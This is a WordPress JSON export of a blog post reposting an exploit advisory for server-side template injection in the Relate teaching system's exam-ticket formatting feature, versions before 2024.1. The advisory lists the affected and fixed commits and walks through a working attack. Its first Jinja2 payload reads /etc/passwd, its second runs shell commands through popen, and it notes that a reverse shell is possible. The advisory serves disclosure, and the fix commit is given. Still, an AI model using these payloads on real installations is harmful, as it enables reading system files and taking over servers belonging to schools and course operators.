{"id":56426,"date":"2024-04-24T19:40:39","date_gmt":"2024-04-24T15:40:39","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178251\/rltsbiet-sstiexec.txt"},"modified":"2024-04-24T19:40:39","modified_gmt":"2024-04-24T15:40:39","slug":"relate-learning-and-teaching-system-ssti-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/relate-learning-and-teaching-system-ssti-remote-code-execution\/","title":{"rendered":"Relate Learning And Teaching System SSTI \/ Remote Code Execution"},"content":{"rendered":"<p># Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Batch-Issue Exam Tickets function) lead to RCE<br \/># Date: 24\/04\/2024<br \/># Exploit Author: kai6u<br \/># Vendor Homepage: https:\/\/github.com\/inducer\/<br \/># Software Link: https:\/\/github.com\/inducer\/relate<br \/># Affected Version:before 2024.1 (https:\/\/github.com\/inducer\/relate\/commit\/2fdbd4480a2d0a45c746639be244a61a0d4112b6)<br \/># Fixed Version:2024.1 (https:\/\/github.com\/inducer\/relate\/commit\/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)<br \/># Tested on: Ubuntu 22.04<br \/># Summary:<br \/>SSTI in Batch-Issue Exam Tickets function of Relate Learning And Teaching system<\/p>\n<p># Description:<br \/>* \u3010Prerequisite\u3011<br \/>* The attacker has stolen the privilege to issue exam tickets. 
For example, the attacker is logged in as a course administrator.<\/p>\n<p>* The SSTI is in the `Batch-Issue Exam Tickets` feature, which allows the user to specify the format in which tickets are distributed and uses a Django (Jinja2) template internally.<\/p>\n<p>1) First, the attacker uses the Ticket Format feature to plant the following payload.<br \/>* Payload:<br \/>* `{{ &#8216;abc&#8217;.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0](&#8216;\/etc\/passwd&#8217;).read() }}`<br \/>* Note that the subclasses index number in the payload depends on the Python version, so it must be adjusted for the target environment.<\/p>\n<p>2) Click Issue Ticket with the above payload in place.<br \/>* You will then see that the contents of the `\/etc\/passwd` file are output after the Ticket Code block.<\/p>\n<p>3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the index of popen.<br \/>* Payload:<br \/>* `{{ &#8216;abc&#8217;.__class__.__base__.__subclasses__()[210](&#8216;whoami&#8217;,shell=True,stdout=-1).communicate()[0].strip() }}`<\/p>\n<p>4) Click Issue Ticket with the above payload in place.<\/p>\n<p>* If you check the results, you will see that `ubuntu` is displayed, which is the output of the whoami command.<br \/>* An attacker can use this feature to execute a reverse shell.<\/p>\n<p># References<br \/>https:\/\/book.hacktricks.xyz\/v\/jp\/pentesting-web\/ssti-server-side-template-injection<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Batch-Issue Exam Tickets function) lead to RCE# Date: 24\/04\/2024# Exploit Author: kai6u# Vendor Homepage: https:\/\/github.com\/inducer\/# Software Link: https:\/\/github.com\/inducer\/relate# Affected Version:before 2024.1 (https:\/\/github.com\/inducer\/relate\/commit\/2fdbd4480a2d0a45c746639be244a61a0d4112b6)# Fixed Version:2024.1 
(https:\/\/github.com\/inducer\/relate\/commit\/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)# Tested on: Ubuntu 22.04# Summary:SSTI in Batch-Issue Exam Tickets function of Relate Learning And Teaching system # Description:* \u3010Prerequisite\u3011* &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56426","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56426","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56426"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56426\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56426"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56426"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56426"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}